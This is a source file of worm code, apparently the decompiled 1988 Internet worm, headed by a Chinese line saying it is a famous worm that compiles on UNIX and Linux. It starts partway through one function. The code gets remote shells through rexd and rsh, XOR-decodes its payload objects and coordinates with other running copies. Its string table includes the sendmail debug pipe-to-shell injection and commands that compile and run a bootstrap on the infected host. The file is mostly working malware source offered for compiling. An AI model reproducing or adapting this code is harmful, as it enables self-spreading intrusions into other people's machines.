hs.c

著名的WORM病毒。 在UNIX/LINUX下可以编译成功。 注意看MAKEFILE。

     struct hst *host;
{
    char username[256];
    char buffer2[512];
    char local[8];
    int result, i, fd_for_sh;			/* 780, 784, 788 */
    
    if (host == me)
	return 0;				/* 530 */
    if (host->flag & HST_HOSTTWO)			/* Already tried ??? */
	return 0;
    
    if (host->o48[0] || host->hostname == NULL)
	getaddrs(host);
    if (host->o48[0] == 0) {
	host->flag |= HST_HOSTFOUR;
	return 0;
    }
    strncpy(username, username2, sizeof(username)-1);
    username[sizeof(username)-1] = '\0';
    
    if (username[0] == '\0')
	strcpy(username, alt_username);
    
    for (i = 0; username[i]; i++)
	if (ispunct(username[i]) || username[i] < ' ')
	    return 0;
    other_sleep(1);
    
    fd_for_sh = x538e(host, username, &alt_username[30]);
    if (fd_for_sh >= 0) {
	result = talk_to_sh(host, fd_for_sh, fd_for_sh);
	close(fd_for_sh);
	return result;
    }
    if (fd_for_sh == -2)
	return 0;
    
    fd_for_sh = x538e(me, alt_username, &alt_username[30]);
    if (fd_for_sh >= 0) {
	sprintf(buffer2, XS("exec /usr/ucb/rsh %s -l %s \'exec /bin/sh\'\n"),
		host->hostname, username);
	send_text(fd_for_sh, buffer2);
	sleep(10);
	result = 0;
	if (test_connection(fd_for_sh, fd_for_sh, 25))	/* 508 */
	    result = talk_to_sh(host, fd_for_sh, fd_for_sh);
	close(fd_for_sh);
	return result;
    }
    return 0;
}

/* Used in hu1.  Returns a file descriptor. */
/* It goes through the six connections in host trying to connect to the
 * remote execution server on each one.
 */
static int x538e(host, name1, name2)
     struct hst *host;
     char *name1, *name2;
{
    int s, i;
    struct sockaddr_in sin;			/* 16 bytes */
    int l6, l7;
    char in_buf[512];
    
    for (i = 0; i < 6; i++) {			/* 552,762 */
	if (host->o48[i] == 0)
	    continue;				/* 754 */
	s = socket(AF_INET, SOCK_STREAM, 0);
	if (s < 0)
	    continue;
	
	bzero(&sin, sizeof(sin));		/* 16 */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = host->o48[i];
	sin.sin_port = IPPORT_EXECSERVER;	/* Oh shit, looking for rexd */
	
	alarm(8);
	signal(SIGALRM, justreturn);
	if (connect(s, &sin, sizeof(sin)) < 0) {
	    alarm(0);
	    close(s);
	    continue;
	}
	alarm(0);
	break;
    }
    if (i >= 6)
	return -2;				/* 1048 */
    /* Check out the connection by writing a null */
    if (write(s, XS(""), 1) == 1) {
	/* Tell the remote execution deamon the hostname, username, and to star
tup
	   "/bin/sh". */
	write(s, name1, strlen(name1) + 1);
	write(s, name2, strlen(name2) + 1);
	if ((write(s, XS("/bin/sh"), strlen(XS("/bin/sh"))+1) >= 0) &&
	    xread(s, in_buf, 1, 20) == 1  &&
	    in_buf[0] == '\0' &&
	    test_connection(s, s, 40) != 0)
	    return s;
    }
    close(s);
    return -1;
}

/* Reads in a file and puts it in the 'objects' array.  Returns 1 if sucessful
,
 * 0 if not. */
loadobject(obj_name)				/* x5594 */
     char *obj_name;
{
    int fd;
    unsigned long size;
    struct stat statbuf;
    char *object_buf, *suffix;
    char local[4];
    
    fd = open(obj_name, O_RDONLY);
    if (fd < 0)
	return 0;				/* 378 */
    if (fstat(fd, &statbuf) < 0) {
	close(fd);
	return 0;
    }
    size = statbuf.st_size;
    object_buf = malloc(size);
    if (object_buf == 0) {
	close(fd);
	return 0;
    }
    if (read(fd, object_buf, size) != size) {
	free(object_buf);
	close(fd);
	return 0;
    }
    close(fd);
    xorbuf(object_buf, size);
    suffix = index(obj_name, ',');
    if (suffix != NULL)
	suffix+=1;
    else
	suffix = obj_name;
    objects[nobjects].name = strcpy(malloc(strlen(suffix)+1), suffix);
    objects[nobjects].size = size;
    objects[nobjects].buf = object_buf;
    nobjects += 1;
    return 1;
}

/* Returns the object from the 'objects' array that has name, otherwise NULL. 
*/
object *getobjectbyname(name)
     char *name;
{
    int i;
    
    for (i = 0; i < nobjects; i++)
	if (strcmp(name, objects[i].name) == 0)
	    return &objects[i];
    return NULL;
}

/* Encodes and decodes the binary coming over the socket. */
xorbuf(buf, size)				/* 0x577e */
     char *buf;
     unsigned long size;
{
    char *addr_self;			/* The address of the xorbuf fuction */
    int i;
    
    addr_self = (char *)xorbuf;
    i = 0; 
    while (size-- > 0) {
	*buf++ ^= addr_self[i];
	i = (i+1) % 10;
    }
    return;
}


static other_fd = -1;

/* Make a connection to the local machine and see if I'm running in
   another process by sending a magic number on a random port and waiting
   five minutes for a reply. */
checkother()					/* 0x57d0 */
{
    int s, l8, l12, l16, optval;
    struct sockaddr_in sin;			/* 16 bytes */
    
    optval = 1;
    if ((random() % 7) == 3)
	return;					/* 612 */
    
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
	return;
    
    /* Make a socket to the localhost, using a link-time specific port */
    bzero(&sin, sizeof(sin));		/* 16 */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1")); /* <other_fd+4> */
    sin.sin_port = 0x00005b3d;			/* ??? */
    
    if (connect(s, &sin, sizeof(sin)) < 0) {
	close(s);
    } else {
	l8 = MAGIC_2;			/* Magic number??? */
	if (write(s, &l8, sizeof(l8)) != sizeof(l8)) {
	    close(s);
	    return;
	}
	l8 = 0;
	if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) {
	    close(s);
	    return;
	}
	if (l8 != MAGIC_1) {
	    close(s);
	    return;
	}
	
	l12 = random()/8;
	if (write(s, &l12, sizeof(l12)) != sizeof(l12)) {
	    close(s);
	    return;
	}
	
	if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) {
	    close(s);
	    return;
	}
	
	if (!((l12+l16) % 2))
	    pleasequit++;
	close(s);
    }
    sleep(5);
    
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
	return;
    
    /* Set the socket so that the address may be reused */
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval));
    if (bind(s, &sin, sizeof(sin)) < 0) {
	close(s);
	return;
    }
    listen(s, 10);
    
    other_fd = s;
    return;
}

/* Sleep, waiting for another worm to contact me. */
other_sleep(how_long)				/* 0x5a38 */
{
    int nfds, readmask;
    long time1, time2;
    struct timeval timeout;
    
    if (other_fd < 0) {
	if (how_long != 0)
	    sleep(how_long);
	return;
    }
    /* Check once again.. */
    do {
	if (other_fd < 0)
	    return;
	readmask = 1 << other_fd;
	if (how_long < 0)
	    how_long = 0;
	
	timeout.tv_sec = how_long;
	timeout.tv_usec = 0;
	
	if (how_long != 0)
	    time(&time1);
	nfds = select(other_fd+1, &readmask, 0, 0, &timeout);
	if (nfds < 0)
	    sleep(1);
	if (readmask != 0)
	    answer_other();
	if (how_long != 0) {
	    time(&time2);
	    how_long -= time2 - time1;
	}
    } while (how_long > 0);
    return;
}

static answer_other()				/* 0x5b14 */
{
    int ns, addrlen, magic_holder, magic1, magic2;
    struct sockaddr_in sin;			/* 16 bytes */
    
    addrlen = sizeof(sin);
    
    ns = accept(other_fd, &sin, &addrlen);
    
    if (ns < 0)
	return;					/* 620 */
    
    magic_holder = MAGIC_1;
    if (write(ns, &magic_holder, sizeof(magic_holder)) != sizeof(magic_holder)
) {
	close(ns);
	return;
    }
    if (xread(ns, &magic_holder, sizeof(magic_holder), 10) != sizeof(magic_holder)) {
	close(ns);
	return;
    }
    if (magic_holder != MAGIC_2) {
	close(ns);
	return;
    }
    
    magic1 = random() / 8;
    if (write(ns, &magic1, sizeof(magic1)) != sizeof(magic1)) {
	close(ns);
	return;
    }
    if (xread(ns, &magic2, sizeof(magic2), 10) != sizeof(magic2)) {
	close(ns);
	return;
    }
    close(ns);
    
    if (sin.sin_addr.s_addr != inet_addr(XS("127.0.0.1")))
	return;
    
    if (((magic1+magic2) % 2) != 0) {
	close(other_fd);
	other_fd = -1;
	pleasequit++;
    }
    return;
}

/* A timeout-based read. */
xread(fd, buf, length, time)			/* 0x5ca8 */
     int fd, time;
     char *buf;
     unsigned long length;
{
    int i, cc, readmask;
    struct timeval timeout;
    int nfds;
    long time1, time2;
    
    for (i = 0; i < length; i++) { 		/* 150 */
	readmask = 1 << fd;
	timeout.tv_sec = time;
	timeout.tv_usec = 0;
	if (select(fd+1, &readmask, 0, 0, &timeout) < 0)
	    return 0;				/* 156 */
	if (readmask == 0)
	    return 0;
	if (read(fd, &buf[i], 1) != 1)
	    return 0;
    }
    return i;
}


/* These are some of the strings that are encyphed in the binary.  The
 * person that wrote the program probably used the Berkeley 'xstr' program
 * to extract and encypher the strings.
 */
#ifdef notdef
char environ[50] = "";
char *sh = "sh";
char *env52 = "sh";			/* 0x20034, <environ+52> */
char *env55 = "-p";
char *env58 = "l1.c";
char *env63 = "sh";
char *env66 = "/tmp/.dump";
char *env77 = "128.32.137.13";
char *env91 = "127.0.0.1";
char *env102 = "/usr/ucb/netstat -r -n";	/* 0x20066 */
char *env125 = "r";
char *env127 = "%s%s";
#endif /* notdef*/
/*
  char *text =
  "default
  0.0.0.0
  127.0.0.1
  exec /bin/sh
  l1.c
  PATH=/bin:/usr/bin:/usr/ucb
  cd /usr/tmp
  x%d.c
  echo gorch49;sed '/int zz;/q' > %s;echo gorch50
  gorch49
  int zz;
  gorch50
  cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE
  DONE
  x%d,%s
  PATH=/bin:/usr/bin:/usr/ucb
  rm -f sh
  if [ -f sh ]
  then
  P=x%d
  else
  P=sh
  cc -o $P %s
  ./$P -p $$ 
  rm -f $P
  rm -f %s $P
  l1.c
  cd /usr/tmp
  x%d.c
  cat > %s <<'EOF'
  cc -o x%d x%d.c;x%d %s %d %d;rm -f x%d x%d.c
  /usr/ucb/rsh
  /usr/bin/rsh
  /bin/rsh
  /bin/echo %s
  debug
  mail from:</dev/null>
  rcpt to:<"| sed '1,/^$/d' | /bin/sh ; exit 0">
  data
  quit
  quit
  exec /usr/ucb/rsh %s -l %s 'exec /bin/sh'
  /bin/sh
  /bin/sh
  127.0.0.1
  127.0.0.1
  /etc/hosts.equiv
  %.100s
  /.rhosts
  %.200s/.forward
  %.20s%.20s
  %[^ ,]
  %*s %[^ ,]s
  %.200s/.forward
  %.200s/.rhosts
  %s%s
  /usr/dict/words";
  */

/*
 * Local variables:
 * compile-command: "cc -S hs.c"
 * comment-column: 48
 * End:
 */